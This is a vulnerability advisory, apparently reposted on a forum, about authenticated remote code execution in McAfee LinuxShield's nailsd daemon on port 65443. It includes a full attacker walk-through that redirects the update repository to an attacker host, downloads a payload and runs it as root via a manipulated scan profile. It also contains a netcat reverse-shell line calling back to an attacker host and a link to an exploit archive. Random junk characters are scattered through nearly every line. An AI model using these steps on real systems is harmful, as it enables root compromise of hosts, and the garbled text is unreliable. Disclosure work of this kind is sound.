    LinuxShield installations can be centrally controlled by ePolicy2 T0 ^1 B3 R4 C) g
    Orchestrator.
    % w' e: f1 ~9 O+ d4 Y# t, z! Z: x! j8 X1 n4 i
    (Product description from LinuxShield Product Guide)1 f8 s8 y- c" p
    & v9 E, v2 o/ |( K
    , L( J  Z/ L/ A/ j7 J4 R; {$ H( h) ^
    3 Z6 r4 L6 G/ q( M3 v; D
    Description:
    # H  T2 E# M4 J( }" S0 _============
      E: c" Q* a( X, f9 f6 @9 v" x7 m1 r: ]* C% T  e! H
    This vulnerability allows remote attackers to execute arbitrary code
    + r8 y9 y3 t- E2 b! S) Aon vulnerable installations of McAfee LinuxShield. User interaction
    1 \% v2 P- O# t' M/ E7 Y, M$ @  {is not required to exploit this vulnerability but an attacker must
    - r  b' r1 _, l& xbe authenticated.5 C) G# e% v2 Q
    - O+ {4 Q- R, `
    The LinuxShield Webinterface communicates with the localy installed
    7 x. P$ j* l4 [( `' j* a- G* K"nailsd" daemon, which listens on port 65443/tcp, to do7 H9 o. k- O0 ]; X, w1 N2 ^
    configuration  m/ U" W& u$ U- O* }6 N% x0 ~& P
    changes, query the configuration and execute tasks.
    7 k6 t3 O6 x& F+ {( @/ b$ d8 q9 m8 V( i
    Each user, which can login to the victim box, can also authenticate0 B; q/ X5 ^6 p/ w( H
    it self to the "nailsd" and can do configuration changes and
      ]  z/ T$ C" @/ kexecute
    4 t7 E' c! {" wtasks with root privileges.
    ! V/ V  j% i3 Z; V
    - {$ Z3 }/ U; E9 x0 oA direct execution of commands is not possible, but it is possible to
    4 _" }: B- U: ]* K/ ?. Fdownload and execute code through manipulation of the config and
    7 ~6 }7 x0 |/ V; h+ a5 Cexecute schedule tasks of the LinuxShield.4 A2 ]7 p  ^5 R5 z, z
    ) G  Z* z  U0 B/ _% X

    8 R; I" M8 e1 i+ e/ ?. E8 d; mwalk-through (after the TLS handshake):& |, l3 N5 ?4 ~3 F$ ]; \
    +--------------------------------------; n5 d/ a' \& g/ I/ ?& u4 H2 s" o

    ; F& n& I. b' Unailsd > +OK welcome to the NAILS Statistics Service
    4 E! G7 ~* D% }. R. Sattacker> auth <user> <pass>2 \0 y4 e* L, h: Q* |
    nailsd > +OK successful authentication
    - \' i( s$ a4 [1 R) p% Z
    0 t/ v/ I: @* t, `" q# Set the Attacker repository to download our code from a httpd/ H1 ]8 |( I$ d9 R& ^! A. Q& m
    # (catalog.z)
    % Z4 O& ~" D  s#---------------------------------------------------------------
    $ O% j. h/ B4 W$ U4 Y: f8 `attacker> db set 1 _table=repository status=1 siteList=<?xml version6 b! X& \$ k) \4 }. q0 y# {3 J
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    4 }" O7 S% |& u0 m; [xmlns:ns="naSiteLi
    & M, B" L# O: i/ ?6 F5 jst" GlobalVersion="20030131003110"0 o- X* H. g# g6 ~7 w! c
    LocalVersion="20091209
    6 ~0 V+ |6 M* L# ]. k* y% M+ F161903" Type="Client"><SiteList  O  k5 _- P' v& d6 ~
    Default="1" Name="SomeGU
    - f8 p1 ~- D& X7 W. `ID"><HttpSite Type="repository"2 @# i2 c- w3 o% ], e) H
    Name="EvilRepo" Order="1
    $ m! h/ V0 j  z* A! f1 l' {& S" Server="<attackerhost>:80"5 h& g$ H* Z# x/ f: D
    Enabled="1" Local="1"><Rela
    ; c( F2 X: b' }
      F* j% s( t2 @- jtivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    # J; z1 }/ d- e5 ?6 S; |3 ErName></4 q  ^$ F2 B( l$ L" o; k6 Y" V$ b6 N
    UserName><Password
    $ ?! g  S0 y0 J+ w8 `/ T3 J6 `Encrypted="0"/></HttpSite></SiteList></
      L$ F% Q1 ?9 i% Z, ens:SiteLists> _cmd=update
    9 x( B3 l% U/ h0 v; D6 tnailsd > +OK database changes buffered.
    + p2 b/ }3 ^; D5 T  O& \5 F2 s3 w7 `
    # Execute task to set the attacker repository; r" O3 ~0 N7 X' T
    #---------------------------------------------------------------0 h, Y) F" P/ h# O/ w- [" `- B  i
    attacker> task setsitelist
    + O! E5 O, O! ?! rnailsd > +OK setting sitelist from CMA.# q. r: k' U2 i% J7 k) E
    ( D9 ~3 P' G6 ^6 ?7 z& O
    # Execute the default Update task to download the code
    0 x6 ]/ j8 O, o7 B% f$ w5 D0 R#---------------------------------------------------------------
    ( p5 z4 D5 j" z* m* nattacker> task nstart LinuxShield Update
    ; A* h( |: k; C+ w7 l  W) Pnailsd > +OK task LinuxShield Update starting
    8 ?' N: z4 e/ Y/ g. u
    ' X3 I$ y) b6 x4 x+ D! Q# Create a Scan profile, which executes our code. The profiles are
    % J4 S3 N! H" x2 `2 k# not stored in the database.( o5 O5 y, z. w9 M7 [5 W) m7 H
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    8 m# E; k" \$ c6 K#---------------------------------------------------------------
    # {5 c7 r& w! j5 _5 k8 uattacker> sconf ODS_99 begin
    6 A6 {( a, ~$ ?, r9 Onailsd > +OK 1260400888
    ( U( x1 R3 O9 N7 T% m+ _- t8 d1 w
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    9 n$ S* g- E: wpath" ^( N" T4 I) z" ?; ?! ]# U  _
    # where our earlier downloaded catalog.z file is stored.% D' k3 X6 C: k
    # (/opt/McAfee/cma/scratch/update/catalog.z). l: D4 H! a8 {
    #---------------------------------------------------------------! I- y* B+ h: b% e0 x
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    : @" l7 f  N# [5 ftrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    / V; H) C/ ^6 b* bDS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=& z3 L' E1 I8 Z
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng3 K- t% M: L) q" P
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro/ S% ^3 [- q0 c% }+ i
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    1 w& `& ?  `( z7 M0 lir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
      g8 y. n) @: a5 A) O9 y" D3 {/ ?ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    8 D: [$ m/ |1 n3 x% [) n8 i.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu: q0 W( l* T9 P8 R# [- J! ^2 H
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    " O9 X: |( q: S4 D- r. U- ve nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99( e; l. ?* N' w/ ], Y) I
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    9 u1 L- X- \8 p+ U& M. g2 sle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    ' M: q0 ~* u7 F3 ]( }dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    7 g3 n6 }( H  @; E1 f6 n1 {: Ve nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    3 O. b) _) S7 x( B: F& ]- l7 R% hofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm! s9 O5 {2 [( Z7 o; m5 f' t* C
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    $ d; F  c! f/ z, K.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t3 `3 O  Z1 |0 Y0 g4 w7 i
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    & B4 ?+ P+ |+ Q; G+ V: Och/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    ! x8 s- u7 f3 _+ o0 {00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.: r$ H2 }/ t; A, w" D! z0 P2 j
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ) A, r+ _% y: R$ y& @ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true  n; u( I4 p; r% i' b% C; O. O8 D
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ' c/ I6 t0 ]( b4 H( R( Q5 Kofile.ODS_99.filter.extensions.type=extension nailsd.profil
    % r* }4 o; p5 X+ e' G+ F$ [( P  ge.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_994 v' {' I% t2 q& m# @* t0 D
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
      Q4 l9 \7 ^& t$ U& M9 s& zaction.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    : R) x* E! O6 f7 A' Y: Jecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa& N: P* p( j' |; V' B( |! Z
    ss nailsd.profile.ODS_99.action.error=Block- _; I% c  `; R# `, l. |
    nailsd > +OK configuration changes buffered. P8 t6 \8 c9 I/ n" y/ U& {+ |1 D
    attacker> sconf ODS_99 commit 12604008880 e1 B9 m/ p, ~6 H
    nailsd > +OK configuration changes stored
    # x& z) R' \7 @  F4 ^1 X  F+ Z, Y) _2 a8 P! \1 _
    # Set a scan task with the manipulated profile to execute the code* a3 }) B0 D6 {9 N; e2 Z
    #---------------------------------------------------------------
    $ P% T% p8 Y( }8 Iattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy# G& e+ o4 e3 R# n
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t; v6 r/ A- j- E2 r" g: e. v/ @
    mp;exclude:false timetable=type=unscheduled taskResults=0 i" ~6 w' i) n( ~$ h- ~
    _lastRun=1260318482 status=Stopped _cmd=insert
    % W. @* d1 v: v. E! Xnailsd > +OK database changes buffered
    / `0 N; d. }8 U3 B6 A. H5 A5 c3 n- Z0 s
    # Execute scan task to execute the code
    # W3 X3 J( ]7 P  y8 G#---------------------------------------------------------------
    3 }1 x3 c  _" ~8 t- J- Sattacker> task nstart Evil Task1 r+ b" e: b; V

    7 H9 Q9 T7 G& ?+ M2 h; W7 m+-------------------------------------- walk-through EOF1 U: n) j9 _+ Y- v2 e

    & V- q4 A/ k- C) J- Y: b! |" ?# h1 W2 i
    To get a reverse root shell place something like this in the catalog.z' Y# {8 b2 P8 u2 B6 r8 E  e
    1 g: _% s- R" `6 P& N6 B
    --- snip ---' ^2 z5 v8 D* x2 X1 Z
    #!/bin/sh! _$ c) o( A5 T3 r
    nc -nv <attacker_host> 4444 -e /bin/sh& T! _: B& j6 c  C9 r: }; @& U
    --- /snip ---
    * p2 x/ l( @) j& I9 P
    8 l3 f4 j9 M5 A7 D2 ]7 K6 Y& @; a$ v& p; X1 |4 P
    + i! \, Z/ B1 P7 `; |2 e6 F
    Proof of Concept :
    6 g: ?, R. x- J' Z+ X2 D==================( m$ ]8 ]; g2 B. d% }
    % s0 ~, ~) H4 d* W2 n! o% O
    http://inj3ct0r.com/sploits/11165.tar.gz
    0 j. E1 _7 T& P( b
    " e0 s8 @" }+ |' X, n  o
    7 D' O2 M) M% j" a' q7 d% X5 b
    5 H* r* u, G6 d, q" jSolution:, v& D0 w; q, ~0 A3 m1 L
    =========' R' X1 o8 X2 W' v) j' K! V: N; m2 m
    9 t; a: G$ S& d- q! {
    McAfee Advisory
    ; S0 B9 m" A! M9 \1 _, u+--------------, ]) i" h1 L4 ~0 C! x6 C
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007. A" }' J$ v: M( @- D; L

    7 P# [5 q7 \. V8 u9 `3 \3 k" ~5 K3 }

    % N+ E- g1 l2 [0 ?+ QDisclosure Timeline (YYYY/MM/DD):- `8 R( j( ]3 L5 N. p" m
    =================================
    : ?, B0 p! l2 f" z( X2 a0 \
    ( T* t- K; r( ]& i8 k6 m$ ~* {: D2009.12.07: Vulnerability found
    2 o' a9 L7 Z5 C" A. T5 X2010.02.03: Asked vendor for a PGP key( ^9 y2 [# M7 Y8 K1 V" X- J
    2010.02.05: Vendor sent his PGP key0 v( |! X& D* R' T0 ~- J. U4 Z& m
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure  q9 Q' S! g) J& k
    date (2010.02.18) to Vendor, V, \) L. }9 a( e: m8 z$ U2 ~7 @7 W: J
    2010.02.05: Vendor acknowledges the reception of the advisory5 P; e! J, E* J1 M
    2010.02.16: Ask for a status update, because the planned release date is" t2 O( [7 q3 O$ [8 {$ R
    2010.02.18.
    ; M9 x  m; I+ m' \5 z" h( e# ^2010.02.16: Vendor response that, they are currently working on a patch
    9 Q* r1 D! G, j4 a2010.02.17: Changed release date to 2010.02.25.$ B% B$ ~. L4 l1 `: Q
    2010.02.22: Vendor gives a status update, that they are able to release
    9 r( Y  C7 |$ s; }" p; i5 k  c8 p, Athe patch on 2010.02.25.2 {) o/ w: o) A, B4 H
    2010.02.24: Ask for a list of affected products and the advisory url.
    . @! \9 D  ]+ i* ?  w9 s; d% E2010.02.24: Vendor sends the list.8 J9 N4 a! q' M& U+ P2 {
    2010.03.02: Release of this Advisory! s. B/ E4 V0 u8 ]% l
    7 F7 _$ B5 d9 v9 H

    3 E* @+ T6 j* Z" w
    ; i4 t0 L: y  V, H
    ! h: v2 B8 K1 [
    & A) C6 A- L7 m  v# O: x7 F7 }
    1 L4 B" k% l$ \5 Z+ u

    0 p6 [' @5 z# I! I  b; M
    6 ]8 B% ^0 j" y) G9 Q, B6 d1 T. s7 S

    ( q2 R* |* N; x7 [/ t$ h3 B! Z$ M0 U3 z4 O% u$ i. x- c
    1 w# K$ `, o5 v  A' v2 U
    ! X+ |# ~5 ?* @" r

    & |5 ~% _" }8 P$ L  m2 w  l" W+ ^. |. S1 o( Q* q# `
    6 [# s3 h9 ?( g

    2 _! x$ n3 M. [+ g4 a  [0 F! F$ V+ v. t5 m, ^! m

    / Z7 ]1 l* p1 P" C0 {
    + t9 Q6 A" ^# y8 d+ X: V( L公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表